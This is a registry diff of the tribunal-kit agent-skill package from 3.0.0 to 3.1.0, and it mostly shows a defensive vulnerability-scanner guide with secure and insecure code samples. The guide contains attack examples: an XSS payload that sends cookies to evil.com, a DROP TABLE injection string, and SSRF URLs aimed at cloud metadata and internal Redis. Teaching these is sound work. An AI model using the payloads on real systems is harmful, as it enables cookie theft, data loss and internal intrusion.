tribunal-kit 3.0.0 → 3.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (226) hide show
  1. package/.agent/ARCHITECTURE.md +99 -99
  2. package/.agent/GEMINI.md +52 -52
  3. package/.agent/agents/accessibility-reviewer.md +187 -220
  4. package/.agent/agents/ai-code-reviewer.md +199 -233
  5. package/.agent/agents/backend-specialist.md +215 -238
  6. package/.agent/agents/code-archaeologist.md +161 -181
  7. package/.agent/agents/database-architect.md +184 -207
  8. package/.agent/agents/debugger.md +191 -218
  9. package/.agent/agents/dependency-reviewer.md +103 -136
  10. package/.agent/agents/devops-engineer.md +218 -238
  11. package/.agent/agents/documentation-writer.md +201 -221
  12. package/.agent/agents/explorer-agent.md +160 -180
  13. package/.agent/agents/frontend-reviewer.md +160 -194
  14. package/.agent/agents/frontend-specialist.md +248 -237
  15. package/.agent/agents/game-developer.md +48 -52
  16. package/.agent/agents/logic-reviewer.md +116 -149
  17. package/.agent/agents/mobile-developer.md +200 -223
  18. package/.agent/agents/mobile-reviewer.md +162 -195
  19. package/.agent/agents/orchestrator.md +181 -211
  20. package/.agent/agents/penetration-tester.md +157 -174
  21. package/.agent/agents/performance-optimizer.md +183 -203
  22. package/.agent/agents/performance-reviewer.md +178 -211
  23. package/.agent/agents/product-manager.md +142 -162
  24. package/.agent/agents/product-owner.md +6 -25
  25. package/.agent/agents/project-planner.md +142 -162
  26. package/.agent/agents/qa-automation-engineer.md +225 -242
  27. package/.agent/agents/security-auditor.md +174 -194
  28. package/.agent/agents/seo-specialist.md +193 -213
  29. package/.agent/agents/sql-reviewer.md +161 -194
  30. package/.agent/agents/supervisor-agent.md +184 -203
  31. package/.agent/agents/swarm-worker-contracts.md +17 -17
  32. package/.agent/agents/swarm-worker-registry.md +46 -46
  33. package/.agent/agents/test-coverage-reviewer.md +160 -193
  34. package/.agent/agents/test-engineer.md +0 -21
  35. package/.agent/agents/type-safety-reviewer.md +175 -208
  36. package/.agent/patterns/generator.md +9 -9
  37. package/.agent/patterns/inversion.md +12 -12
  38. package/.agent/patterns/pipeline.md +9 -9
  39. package/.agent/patterns/reviewer.md +13 -13
  40. package/.agent/patterns/tool-wrapper.md +9 -9
  41. package/.agent/rules/GEMINI.md +63 -63
  42. package/.agent/scripts/compress_skills.py +167 -0
  43. package/.agent/scripts/consolidate_skills.py +173 -0
  44. package/.agent/scripts/deep_compress.py +202 -0
  45. package/.agent/scripts/minify_context.py +80 -0
  46. package/.agent/scripts/security_scan.py +1 -1
  47. package/.agent/scripts/strip_tribunal.py +41 -0
  48. package/.agent/skills/agent-organizer/SKILL.md +92 -126
  49. package/.agent/skills/agentic-patterns/SKILL.md +0 -70
  50. package/.agent/skills/ai-prompt-injection-defense/SKILL.md +126 -160
  51. package/.agent/skills/api-patterns/SKILL.md +123 -215
  52. package/.agent/skills/api-security-auditor/SKILL.md +143 -177
  53. package/.agent/skills/app-builder/SKILL.md +326 -50
  54. package/.agent/skills/app-builder/templates/SKILL.md +13 -15
  55. package/.agent/skills/app-builder/templates/astro-static/TEMPLATE.md +16 -16
  56. package/.agent/skills/app-builder/templates/chrome-extension/TEMPLATE.md +22 -22
  57. package/.agent/skills/app-builder/templates/cli-tool/TEMPLATE.md +18 -18
  58. package/.agent/skills/app-builder/templates/electron-desktop/TEMPLATE.md +20 -20
  59. package/.agent/skills/app-builder/templates/express-api/TEMPLATE.md +17 -17
  60. package/.agent/skills/app-builder/templates/flutter-app/TEMPLATE.md +18 -18
  61. package/.agent/skills/app-builder/templates/monorepo-turborepo/TEMPLATE.md +21 -21
  62. package/.agent/skills/app-builder/templates/nextjs-fullstack/TEMPLATE.md +19 -19
  63. package/.agent/skills/app-builder/templates/nextjs-saas/TEMPLATE.md +26 -26
  64. package/.agent/skills/app-builder/templates/nextjs-static/TEMPLATE.md +26 -26
  65. package/.agent/skills/app-builder/templates/nuxt-app/TEMPLATE.md +19 -19
  66. package/.agent/skills/app-builder/templates/python-fastapi/TEMPLATE.md +18 -18
  67. package/.agent/skills/app-builder/templates/react-native-app/TEMPLATE.md +20 -20
  68. package/.agent/skills/appflow-wireframe/SKILL.md +87 -121
  69. package/.agent/skills/architecture/SKILL.md +82 -252
  70. package/.agent/skills/authentication-best-practices/SKILL.md +139 -173
  71. package/.agent/skills/bash-linux/SKILL.md +120 -154
  72. package/.agent/skills/behavioral-modes/SKILL.md +8 -69
  73. package/.agent/skills/brainstorming/SKILL.md +428 -104
  74. package/.agent/skills/building-native-ui/SKILL.md +143 -174
  75. package/.agent/skills/clean-code/SKILL.md +323 -360
  76. package/.agent/skills/code-review-checklist/SKILL.md +0 -62
  77. package/.agent/skills/config-validator/SKILL.md +107 -141
  78. package/.agent/skills/csharp-developer/SKILL.md +468 -528
  79. package/.agent/skills/database-design/SKILL.md +104 -369
  80. package/.agent/skills/deployment-procedures/SKILL.md +111 -145
  81. package/.agent/skills/devops-engineer/SKILL.md +295 -332
  82. package/.agent/skills/devops-incident-responder/SKILL.md +79 -113
  83. package/.agent/skills/doc.md +5 -5
  84. package/.agent/skills/documentation-templates/SKILL.md +19 -63
  85. package/.agent/skills/edge-computing/SKILL.md +123 -157
  86. package/.agent/skills/extract-design-system/SKILL.md +100 -134
  87. package/.agent/skills/framer-motion-expert/SKILL.md +111 -855
  88. package/.agent/skills/frontend-design/SKILL.md +151 -499
  89. package/.agent/skills/game-design-expert/SKILL.md +71 -105
  90. package/.agent/skills/game-engineering-expert/SKILL.md +88 -122
  91. package/.agent/skills/geo-fundamentals/SKILL.md +89 -124
  92. package/.agent/skills/github-operations/SKILL.md +279 -314
  93. package/.agent/skills/gsap-expert/SKILL.md +119 -826
  94. package/.agent/skills/i18n-localization/SKILL.md +104 -138
  95. package/.agent/skills/intelligent-routing/SKILL.md +159 -127
  96. package/.agent/skills/lint-and-validate/SKILL.md +8 -52
  97. package/.agent/skills/llm-engineering/SKILL.md +344 -357
  98. package/.agent/skills/local-first/SKILL.md +120 -154
  99. package/.agent/skills/mcp-builder/SKILL.md +84 -118
  100. package/.agent/skills/mobile-design/SKILL.md +213 -219
  101. package/.agent/skills/motion-engineering/SKILL.md +184 -0
  102. package/.agent/skills/nextjs-react-expert/SKILL.md +99 -698
  103. package/.agent/skills/nodejs-best-practices/SKILL.md +498 -559
  104. package/.agent/skills/observability/SKILL.md +293 -330
  105. package/.agent/skills/parallel-agents/SKILL.md +88 -122
  106. package/.agent/skills/performance-profiling/SKILL.md +217 -254
  107. package/.agent/skills/plan-writing/SKILL.md +84 -118
  108. package/.agent/skills/platform-engineer/SKILL.md +89 -123
  109. package/.agent/skills/playwright-best-practices/SKILL.md +128 -162
  110. package/.agent/skills/powershell-windows/SKILL.md +112 -146
  111. package/.agent/skills/python-patterns/SKILL.md +7 -35
  112. package/.agent/skills/python-pro/SKILL.md +148 -754
  113. package/.agent/skills/react-specialist/SKILL.md +123 -827
  114. package/.agent/skills/readme-builder/SKILL.md +15 -85
  115. package/.agent/skills/realtime-patterns/SKILL.md +269 -304
  116. package/.agent/skills/red-team-tactics/SKILL.md +10 -51
  117. package/.agent/skills/rust-pro/SKILL.md +623 -701
  118. package/.agent/skills/seo-fundamentals/SKILL.md +120 -154
  119. package/.agent/skills/server-management/SKILL.md +156 -190
  120. package/.agent/skills/shadcn-ui-expert/SKILL.md +172 -206
  121. package/.agent/skills/skill-creator/SKILL.md +18 -58
  122. package/.agent/skills/sql-pro/SKILL.md +579 -633
  123. package/.agent/skills/supabase-postgres-best-practices/SKILL.md +28 -68
  124. package/.agent/skills/swiftui-expert/SKILL.md +142 -176
  125. package/.agent/skills/systematic-debugging/SKILL.md +84 -118
  126. package/.agent/skills/tailwind-patterns/SKILL.md +516 -576
  127. package/.agent/skills/tdd-workflow/SKILL.md +103 -137
  128. package/.agent/skills/test-result-analyzer/SKILL.md +33 -73
  129. package/.agent/skills/testing-patterns/SKILL.md +512 -573
  130. package/.agent/skills/trend-researcher/SKILL.md +30 -71
  131. package/.agent/skills/ui-ux-pro-max/SKILL.md +0 -41
  132. package/.agent/skills/ui-ux-researcher/SKILL.md +51 -91
  133. package/.agent/skills/vue-expert/SKILL.md +127 -866
  134. package/.agent/skills/vulnerability-scanner/SKILL.md +354 -269
  135. package/.agent/skills/web-accessibility-auditor/SKILL.md +159 -193
  136. package/.agent/skills/web-design-guidelines/SKILL.md +17 -61
  137. package/.agent/skills/webapp-testing/SKILL.md +111 -145
  138. package/.agent/skills/whimsy-injector/SKILL.md +58 -132
  139. package/.agent/skills/workflow-optimizer/SKILL.md +28 -68
  140. package/.agent/workflows/api-tester.md +151 -151
  141. package/.agent/workflows/audit.md +127 -138
  142. package/.agent/workflows/brainstorm.md +110 -110
  143. package/.agent/workflows/changelog.md +112 -112
  144. package/.agent/workflows/create.md +124 -124
  145. package/.agent/workflows/debug.md +165 -189
  146. package/.agent/workflows/deploy.md +180 -189
  147. package/.agent/workflows/enhance.md +128 -151
  148. package/.agent/workflows/fix.md +114 -135
  149. package/.agent/workflows/generate.md +12 -4
  150. package/.agent/workflows/migrate.md +160 -160
  151. package/.agent/workflows/orchestrate.md +168 -168
  152. package/.agent/workflows/performance-benchmarker.md +114 -123
  153. package/.agent/workflows/plan.md +173 -173
  154. package/.agent/workflows/preview.md +80 -80
  155. package/.agent/workflows/refactor.md +161 -183
  156. package/.agent/workflows/review-ai.md +101 -129
  157. package/.agent/workflows/review.md +116 -116
  158. package/.agent/workflows/session.md +94 -94
  159. package/.agent/workflows/status.md +79 -79
  160. package/.agent/workflows/strengthen-skills.md +138 -139
  161. package/.agent/workflows/swarm.md +179 -179
  162. package/.agent/workflows/test.md +189 -211
  163. package/.agent/workflows/tribunal-backend.md +93 -113
  164. package/.agent/workflows/tribunal-database.md +94 -115
  165. package/.agent/workflows/tribunal-frontend.md +95 -118
  166. package/.agent/workflows/tribunal-full.md +92 -133
  167. package/.agent/workflows/tribunal-mobile.md +94 -119
  168. package/.agent/workflows/tribunal-performance.md +109 -133
  169. package/.agent/workflows/ui-ux-pro-max.md +122 -143
  170. package/package.json +1 -1
  171. package/.agent/skills/api-patterns/api-style.md +0 -42
  172. package/.agent/skills/api-patterns/auth.md +0 -24
  173. package/.agent/skills/api-patterns/documentation.md +0 -26
  174. package/.agent/skills/api-patterns/graphql.md +0 -41
  175. package/.agent/skills/api-patterns/rate-limiting.md +0 -31
  176. package/.agent/skills/api-patterns/response.md +0 -37
  177. package/.agent/skills/api-patterns/rest.md +0 -40
  178. package/.agent/skills/api-patterns/security-testing.md +0 -122
  179. package/.agent/skills/api-patterns/trpc.md +0 -41
  180. package/.agent/skills/api-patterns/versioning.md +0 -22
  181. package/.agent/skills/app-builder/agent-coordination.md +0 -71
  182. package/.agent/skills/app-builder/feature-building.md +0 -53
  183. package/.agent/skills/app-builder/project-detection.md +0 -34
  184. package/.agent/skills/app-builder/scaffolding.md +0 -118
  185. package/.agent/skills/app-builder/tech-stack.md +0 -40
  186. package/.agent/skills/architecture/context-discovery.md +0 -43
  187. package/.agent/skills/architecture/examples.md +0 -94
  188. package/.agent/skills/architecture/pattern-selection.md +0 -68
  189. package/.agent/skills/architecture/patterns-reference.md +0 -50
  190. package/.agent/skills/architecture/trade-off-analysis.md +0 -77
  191. package/.agent/skills/brainstorming/dynamic-questioning.md +0 -360
  192. package/.agent/skills/database-design/database-selection.md +0 -43
  193. package/.agent/skills/database-design/indexing.md +0 -39
  194. package/.agent/skills/database-design/migrations.md +0 -48
  195. package/.agent/skills/database-design/optimization.md +0 -36
  196. package/.agent/skills/database-design/orm-selection.md +0 -30
  197. package/.agent/skills/database-design/schema-design.md +0 -56
  198. package/.agent/skills/frontend-design/animation-guide.md +0 -331
  199. package/.agent/skills/frontend-design/color-system.md +0 -329
  200. package/.agent/skills/frontend-design/decision-trees.md +0 -418
  201. package/.agent/skills/frontend-design/motion-graphics.md +0 -306
  202. package/.agent/skills/frontend-design/typography-system.md +0 -363
  203. package/.agent/skills/frontend-design/ux-psychology.md +0 -1116
  204. package/.agent/skills/frontend-design/visual-effects.md +0 -383
  205. package/.agent/skills/intelligent-routing/router-manifest.md +0 -65
  206. package/.agent/skills/mobile-design/decision-trees.md +0 -516
  207. package/.agent/skills/mobile-design/mobile-backend.md +0 -491
  208. package/.agent/skills/mobile-design/mobile-color-system.md +0 -420
  209. package/.agent/skills/mobile-design/mobile-debugging.md +0 -122
  210. package/.agent/skills/mobile-design/mobile-design-thinking.md +0 -357
  211. package/.agent/skills/mobile-design/mobile-navigation.md +0 -458
  212. package/.agent/skills/mobile-design/mobile-performance.md +0 -767
  213. package/.agent/skills/mobile-design/mobile-testing.md +0 -356
  214. package/.agent/skills/mobile-design/mobile-typography.md +0 -433
  215. package/.agent/skills/mobile-design/platform-android.md +0 -666
  216. package/.agent/skills/mobile-design/platform-ios.md +0 -561
  217. package/.agent/skills/mobile-design/touch-psychology.md +0 -537
  218. package/.agent/skills/nextjs-react-expert/1-async-eliminating-waterfalls.md +0 -312
  219. package/.agent/skills/nextjs-react-expert/2-bundle-bundle-size-optimization.md +0 -240
  220. package/.agent/skills/nextjs-react-expert/3-server-server-side-performance.md +0 -490
  221. package/.agent/skills/nextjs-react-expert/4-client-client-side-data-fetching.md +0 -264
  222. package/.agent/skills/nextjs-react-expert/5-rerender-re-render-optimization.md +0 -581
  223. package/.agent/skills/nextjs-react-expert/6-rendering-rendering-performance.md +0 -432
  224. package/.agent/skills/nextjs-react-expert/7-js-javascript-performance.md +0 -684
  225. package/.agent/skills/nextjs-react-expert/8-advanced-advanced-patterns.md +0 -150
  226. package/.agent/skills/vulnerability-scanner/checklists.md +0 -121
@@ -1,269 +1,354 @@
1
- ---
2
- name: vulnerability-scanner
3
- description: Security vulnerability analysis mastery. OWASP Top 10 (2025), injection attacks (SQL, XSS, SSRF, command), authentication/authorization flaws, dependency vulnerabilities, secret scanning, CORS misconfiguration, supply chain attacks, and security headers. Use when auditing security, reviewing code for vulnerabilities, or hardening applications.
4
- allowed-tools: Read, Write, Edit, Glob, Grep
5
- version: 2.0.0
6
- last-updated: 2026-04-01
7
- applies-to-model: gemini-2.5-pro, claude-3-7-sonnet
8
- ---
9
-
10
- # Vulnerability Scanner — Security Analysis Mastery
11
-
12
- > Every input is hostile. Every dependency is a liability. Every secret is one commit from exposure.
13
- > Security is not a feature — it's a constraint on every line of code you write.
14
-
15
- ---
16
-
17
- ## OWASP Top 10 (2025)
18
-
19
- ```
20
- A01 Broken Access Control → Missing authorization checks
21
- A02 Cryptographic Failures Weak encryption, exposed secrets
22
- A03 Injection SQL, XSS, command, LDAP
23
- A04 Insecure Design Missing threat modeling
24
- A05 Security Misconfiguration Default credentials, verbose errors
25
- A06 Vulnerable Components Outdated dependencies
26
- A07 Authentication Failures Weak passwords, missing MFA
27
- A08 Data Integrity Failures → Untrusted deserialization, missing SRI
28
- A09 Logging & Monitoring Failures → No audit trail, alert blindness
29
- A10 SSRF → Server-side request forgery
30
- ```
31
-
32
- ---
33
-
34
- ## Injection Attacks
35
-
36
- ### SQL Injection
37
-
38
- ```typescript
39
- // ❌ VULNERABLE: String interpolation in SQL
40
- const query = `SELECT * FROM users WHERE email = '${email}'`;
41
- // Attack: email = "'; DROP TABLE users; --"
42
-
43
- // ✅ SAFE: Parameterized queries
44
- const result = await db.query("SELECT * FROM users WHERE email = $1", [email]);
45
-
46
- // SAFE: ORM (Prisma, Drizzle)
47
- const user = await prisma.user.findUnique({ where: { email } });
48
-
49
- // ❌ HALLUCINATION TRAP: Template literals are NOT parameterized
50
- // ❌ db.query(`SELECT * FROM users WHERE id = ${id}`); ← VULNERABLE
51
- // db.query("SELECT * FROM users WHERE id = $1", [id]); ← SAFE
52
- ```
53
-
54
- ### XSS (Cross-Site Scripting)
55
-
56
- ```typescript
57
- // ❌ VULNERABLE: innerHTML with user input
58
- element.innerHTML = userComment;
59
- // Attack: userComment = "<script>document.location='https://evil.com?c='+document.cookie</script>"
60
-
61
- // SAFE: textContent (no HTML parsing)
62
- element.textContent = userComment;
63
-
64
- // React auto-escapes by default — BUT:
65
- // VULNERABLE in React:
66
- <div dangerouslySetInnerHTML={{ __html: userInput }} /> // bypasses escaping
67
-
68
- // SAFE in React:
69
- <div>{userInput}</div> // auto-escaped
70
-
71
- // Content Security Policy (defense in depth)
72
- // Add HTTP header:
73
- // Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
74
- ```
75
-
76
- ### SSRF (Server-Side Request Forgery)
77
-
78
- ```typescript
79
- // ❌ VULNERABLE: fetching user-provided URLs
80
- app.get("/proxy", async (req, res) => {
81
- const data = await fetch(req.query.url).then(r => r.text());
82
- res.send(data);
83
- });
84
- // Attack: url = "http://169.254.169.254/latest/meta-data/" (AWS metadata)
85
- // Attack: url = "http://localhost:6379/" (internal Redis)
86
-
87
- // SAFE: Allowlist of domains
88
- const ALLOWED_HOSTS = new Set(["api.example.com", "cdn.example.com"]);
89
-
90
- app.get("/proxy", async (req, res) => {
91
- const url = new URL(req.query.url as string);
92
- if (!ALLOWED_HOSTS.has(url.hostname)) {
93
- return res.status(403).json({ error: "Domain not allowed" });
94
- }
95
- // Additional: block private IP ranges
96
- const ip = await dns.resolve4(url.hostname);
97
- if (isPrivateIP(ip[0])) {
98
- return res.status(403).json({ error: "Private IP not allowed" });
99
- }
100
- const data = await fetch(url).then(r => r.text());
101
- res.send(data);
102
- });
103
- ```
104
-
105
- ---
106
-
107
- ## Authentication & Authorization
108
-
109
- ```typescript
110
- // JWT Best Practices
111
- import jwt from "jsonwebtoken";
112
-
113
- // SAFE: Specify algorithm explicitly
114
- const token = jwt.sign(payload, SECRET, {
115
- algorithm: "HS256", // explicit
116
- expiresIn: "15m", // short-lived access token
117
- issuer: "myapp",
118
- });
119
-
120
- // ✅ SAFE: Verify with explicit algorithms
121
- const decoded = jwt.verify(token, SECRET, {
122
- algorithms: ["HS256"], // MUST specify — prevents algorithm confusion attack
123
- issuer: "myapp",
124
- });
125
-
126
- // ❌ HALLUCINATION TRAP: jwt.verify() without algorithms option is VULNERABLE
127
- // jwt.verify(token, SECRET); ← accepts ANY algorithm including "none"
128
- // ✅ jwt.verify(token, SECRET, { algorithms: ["HS256"] });
129
-
130
- // Authorization: check BEFORE business logic
131
- app.delete("/api/posts/:id", async (req, res) => {
132
- const post = await getPost(req.params.id);
133
- if (!post) return res.status(404).json({ error: "Not found" });
134
-
135
- // ✅ Authorization check BEFORE delete
136
- if (post.authorId !== req.user.id && req.user.role !== "admin") {
137
- return res.status(403).json({ error: "Forbidden" });
138
- }
139
-
140
- await deletePost(post.id);
141
- res.status(204).send();
142
- });
143
- ```
144
-
145
- ---
146
-
147
- ## Dependency Security
148
-
149
- ```bash
150
- # Check for known vulnerabilities
151
- npm audit # built-in
152
- npx snyk test # Snyk (more comprehensive)
153
- npx socket check # Socket.dev (supply chain)
154
-
155
- # Auto-fix
156
- npm audit fix
157
-
158
- # lock file integrity
159
- # ✅ Commit package-lock.json / pnpm-lock.yaml
160
- # ✅ Use npm ci in CI (not npm install)
161
- # ✅ Pin exact versions for critical dependencies
162
- # ✅ Enable Dependabot or Renovate for auto-updates
163
- ```
164
-
165
- ```
166
- Supply chain attack vectors:
167
- 1. Typosquatting "recat" instead of "react"
168
- 2. Maintainer hijack compromised npm account
169
- 3. Dependency confusion → private package name exists on public registry
170
- 4. Malicious postinstall → runs arbitrary code on npm install
171
- 5. Abandoned packages → unmaintained, no security patches
172
-
173
- Defense:
174
- - Review new dependencies before adding
175
- - Use npm audit in CI (fail on high severity)
176
- - Pin versions, review lockfile diffs
177
- - Use --ignore-scripts for untrusted packages
178
- ```
179
-
180
- ---
181
-
182
- ## Security Headers
183
-
184
- ```typescript
185
- import helmet from "helmet";
186
-
187
- app.use(helmet()); // Sets secure defaults
188
-
189
- // Key headers set by helmet:
190
- // Content-Security-Policy Controls resource loading
191
- // X-Content-Type-Options Prevents MIME sniffing (nosniff)
192
- // X-Frame-Options Prevents clickjacking (DENY)
193
- // Strict-Transport-Security → Forces HTTPS (HSTS)
194
- // X-XSS-Protection → Legacy XSS filter (deprecated, CSP is better)
195
- // Referrer-Policy → Controls referrer header
196
-
197
- // CORS never wildcard in production
198
- app.use(cors({
199
- origin: ["https://myapp.com", "https://admin.myapp.com"],
200
- methods: ["GET", "POST", "PUT", "DELETE"],
201
- credentials: true,
202
- }));
203
-
204
- // ❌ HALLUCINATION TRAP: origin: "*" disables CORS protection entirely
205
- // ❌ cors({ origin: "*" }) ← allows any website to call your API
206
- // ✅ cors({ origin: ["https://myapp.com"] }) ← whitelist specific domains
207
- ```
208
-
209
- ---
210
-
211
- ## Secret Scanning
212
-
213
- ```
214
- Secrets that MUST be in environment variables:
215
- - Database connection strings
216
- - API keys (Stripe, SendGrid, etc.)
217
- - JWT signing secrets
218
- - OAuth client secrets
219
- - Encryption keys
220
-
221
- Detection tools:
222
- - git-secrets (pre-commit hook)
223
- - TruffleHog / detect-secrets (scan history)
224
- - GitHub secret scanning (automatic)
225
- - GitGuardian (enterprise)
226
-
227
- If a secret is committed:
228
- 1. IMMEDIATELY rotate the secret (new key/password)
229
- 2. Remove from git history (BFG Repo-Cleaner or git-filter-repo)
230
- 3. Force-push cleaned history
231
- 4. Audit access logs for the compromised secret
232
- 5. Post-incident review
233
- ```
234
-
235
- ---
236
-
237
- ## 🤖 LLM-Specific Traps
238
-
239
- 1. **Template Literals for SQL:** `\`SELECT * FROM users WHERE id = ${id}\`` is SQL injection. Use parameterized queries.
240
- 2. **`dangerouslySetInnerHTML` Without Sanitization:** React's escape valve for XSS. Never use with user input.
241
- 3. **`jwt.verify()` Without `algorithms`:** Without specifying algorithms, JWT accepts "none" — bypasses all verification.
242
- 4. **CORS `origin: "*"`:** Wildcard CORS disables protection. Always allowlist specific domains.
243
- 5. **Authorization After Business Logic:** Check permissions BEFORE executing the action, not after.
244
- 6. **`npm install` in CI:** Use `npm ci` for deterministic, lockfile-based installs. `npm install` can change lockfile.
245
- 7. **Hardcoded Secrets in Source:** Secrets in code are in git history forever. Use environment variables.
246
- 8. **SSRF Via User URLs:** Never fetch user-provided URLs without domain allowlisting and private IP blocking.
247
- 9. **Missing Rate Limiting on Auth:** Login endpoints without rate limiting enable brute-force attacks.
248
- 10. **Verbose Error Messages in Production:** Stack traces in API responses expose internal implementation details.
249
-
250
- ---
251
-
252
- ## 🏛️ Tribunal Integration
253
-
254
- **Slash command: `/tribunal-backend` or `/audit`**
255
-
256
- ### Pre-Flight Self-Audit
257
-
258
- ```
259
- ✅ Are all SQL queries parameterized (no string interpolation)?
260
- Is user input sanitized before rendering (no innerHTML)?
261
- Does JWT verify specify algorithms explicitly?
262
- Is CORS configured with specific origins (not wildcard)?
263
- Are authorization checks BEFORE business logic?
264
- ✅ Are all secrets in environment variables (not source code)?
265
- Is `npm ci` used in CI (not `npm install`)?
266
- Are security headers configured (helmet)?
267
- Is rate limiting enabled on auth endpoints?
268
- Are error messages generic in production (no stack traces)?
269
- ```
1
+ ---
2
+ name: vulnerability-scanner
3
+ description: Security vulnerability analysis mastery. OWASP Top 10 (2025), injection attacks (SQL, XSS, SSRF, command), authentication/authorization flaws, dependency vulnerabilities, secret scanning, CORS misconfiguration, supply chain attacks, and security headers. Use when auditing security, reviewing code for vulnerabilities, or hardening applications.
4
+ allowed-tools: Read, Write, Edit, Glob, Grep
5
+ version: 3.1.0
6
+ last-updated: 2026-04-06
7
+ applies-to-model: gemini-2.5-pro, claude-3-7-sonnet
8
+ ---
9
+
10
+ # Vulnerability Scanner — Security Analysis Mastery
11
+
12
+ ---
13
+
14
+ ## OWASP Top 10 (2025)
15
+
16
+ ```
17
+ A01 Broken Access Control → Missing authorization checks
18
+ A02 Cryptographic Failures → Weak encryption, exposed secrets
19
+ A03 Injection → SQL, XSS, command, LDAP
20
+ A04 Insecure Design → Missing threat modeling
21
+ A05 Security Misconfiguration Default credentials, verbose errors
22
+ A06 Vulnerable Components Outdated dependencies
23
+ A07 Authentication Failures Weak passwords, missing MFA
24
+ A08 Data Integrity Failures Untrusted deserialization, missing SRI
25
+ A09 Logging & Monitoring Failures No audit trail, alert blindness
26
+ A10 SSRF Server-side request forgery
27
+ ```
28
+
29
+ ---
30
+
31
+ ## Injection Attacks
32
+
33
+ ### SQL Injection
34
+
35
+ ```typescript
36
+ // ❌ VULNERABLE: String interpolation in SQL
37
+ const query = `SELECT * FROM users WHERE email = '${email}'`;
38
+ // Attack: email = "'; DROP TABLE users; --"
39
+
40
+ // SAFE: Parameterized queries
41
+ const result = await db.query("SELECT * FROM users WHERE email = $1", [email]);
42
+
43
+ // ✅ SAFE: ORM (Prisma, Drizzle)
44
+ const user = await prisma.user.findUnique({ where: { email } });
45
+
46
+ // HALLUCINATION TRAP: Template literals are NOT parameterized
47
+ // db.query(`SELECT * FROM users WHERE id = ${id}`); ← VULNERABLE
48
+ // ✅ db.query("SELECT * FROM users WHERE id = $1", [id]); ← SAFE
49
+ ```
50
+
51
+ ### XSS (Cross-Site Scripting)
52
+
53
+ ```typescript
54
+ // VULNERABLE: innerHTML with user input
55
+ element.innerHTML = userComment;
56
+ // Attack: userComment = "<script>document.location='https://evil.com?c='+document.cookie</script>"
57
+
58
+ // SAFE: textContent (no HTML parsing)
59
+ element.textContent = userComment;
60
+
61
+ // React auto-escapes by default BUT:
62
+ // VULNERABLE in React:
63
+ <div dangerouslySetInnerHTML={{ __html: userInput }} /> // bypasses escaping
64
+
65
+ // SAFE in React:
66
+ <div>{userInput}</div> // auto-escaped
67
+
68
+ // Content Security Policy (defense in depth)
69
+ // Add HTTP header:
70
+ // Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
71
+ ```
72
+
73
+ ### SSRF (Server-Side Request Forgery)
74
+
75
+ ```typescript
76
+ // VULNERABLE: fetching user-provided URLs
77
+ app.get("/proxy", async (req, res) => {
78
+ const data = await fetch(req.query.url).then(r => r.text());
79
+ res.send(data);
80
+ });
81
+ // Attack: url = "http://169.254.169.254/latest/meta-data/" (AWS metadata)
82
+ // Attack: url = "http://localhost:6379/" (internal Redis)
83
+
84
+ // ✅ SAFE: Allowlist of domains
85
+ const ALLOWED_HOSTS = new Set(["api.example.com", "cdn.example.com"]);
86
+
87
+ app.get("/proxy", async (req, res) => {
88
+ const url = new URL(req.query.url as string);
89
+ if (!ALLOWED_HOSTS.has(url.hostname)) {
90
+ return res.status(403).json({ error: "Domain not allowed" });
91
+ }
92
+ // Additional: block private IP ranges
93
+ const ip = await dns.resolve4(url.hostname);
94
+ if (isPrivateIP(ip[0])) {
95
+ return res.status(403).json({ error: "Private IP not allowed" });
96
+ }
97
+ const data = await fetch(url).then(r => r.text());
98
+ res.send(data);
99
+ });
100
+ ```
101
+
102
+ ---
103
+
104
+ ## Authentication & Authorization
105
+
106
+ ```typescript
107
+ // JWT Best Practices
108
+ import jwt from "jsonwebtoken";
109
+
110
+ // SAFE: Specify algorithm explicitly
111
+ const token = jwt.sign(payload, SECRET, {
112
+ algorithm: "HS256", // explicit
113
+ expiresIn: "15m", // short-lived access token
114
+ issuer: "myapp",
115
+ });
116
+
117
+ // ✅ SAFE: Verify with explicit algorithms
118
+ const decoded = jwt.verify(token, SECRET, {
119
+ algorithms: ["HS256"], // MUST specify — prevents algorithm confusion attack
120
+ issuer: "myapp",
121
+ });
122
+
123
+ // ❌ HALLUCINATION TRAP: jwt.verify() without algorithms option is VULNERABLE
124
+ // ❌ jwt.verify(token, SECRET); ← accepts ANY algorithm including "none"
125
+ // ✅ jwt.verify(token, SECRET, { algorithms: ["HS256"] });
126
+
127
+ // Authorization: check BEFORE business logic
128
+ app.delete("/api/posts/:id", async (req, res) => {
129
+ const post = await getPost(req.params.id);
130
+ if (!post) return res.status(404).json({ error: "Not found" });
131
+
132
+ // Authorization check BEFORE delete
133
+ if (post.authorId !== req.user.id && req.user.role !== "admin") {
134
+ return res.status(403).json({ error: "Forbidden" });
135
+ }
136
+
137
+ await deletePost(post.id);
138
+ res.status(204).send();
139
+ });
140
+ ```
141
+
142
+ ---
143
+
144
+ ## Dependency Security
145
+
146
+ ```bash
147
+ # Check for known vulnerabilities
148
+ npm audit # built-in
149
+ npx snyk test # Snyk (more comprehensive)
150
+ npx socket check # Socket.dev (supply chain)
151
+
152
+ # Auto-fix
153
+ npm audit fix
154
+
155
+ # lock file integrity
156
+ # Commit package-lock.json / pnpm-lock.yaml
157
+ # ✅ Use npm ci in CI (not npm install)
158
+ # Pin exact versions for critical dependencies
159
+ # ✅ Enable Dependabot or Renovate for auto-updates
160
+ ```
161
+
162
+ ```
163
+ Supply chain attack vectors:
164
+ 1. Typosquatting → "recat" instead of "react"
165
+ 2. Maintainer hijack → compromised npm account
166
+ 3. Dependency confusion → private package name exists on public registry
167
+ 4. Malicious postinstall runs arbitrary code on npm install
168
+ 5. Abandoned packages unmaintained, no security patches
169
+
170
+ Defense:
171
+ - Review new dependencies before adding
172
+ - Use npm audit in CI (fail on high severity)
173
+ - Pin versions, review lockfile diffs
174
+ - Use --ignore-scripts for untrusted packages
175
+ ```
176
+
177
+ ---
178
+
179
+ ## Security Headers
180
+
181
+ ```typescript
182
+ import helmet from "helmet";
183
+
184
+ app.use(helmet()); // Sets secure defaults
185
+
186
+ // Key headers set by helmet:
187
+ // Content-Security-Policy → Controls resource loading
188
+ // X-Content-Type-Options → Prevents MIME sniffing (nosniff)
189
+ // X-Frame-Options → Prevents clickjacking (DENY)
190
+ // Strict-Transport-Security Forces HTTPS (HSTS)
191
+ // X-XSS-Protection Legacy XSS filter (deprecated, CSP is better)
192
+ // Referrer-Policy Controls referrer header
193
+
194
+ // CORS never wildcard in production
195
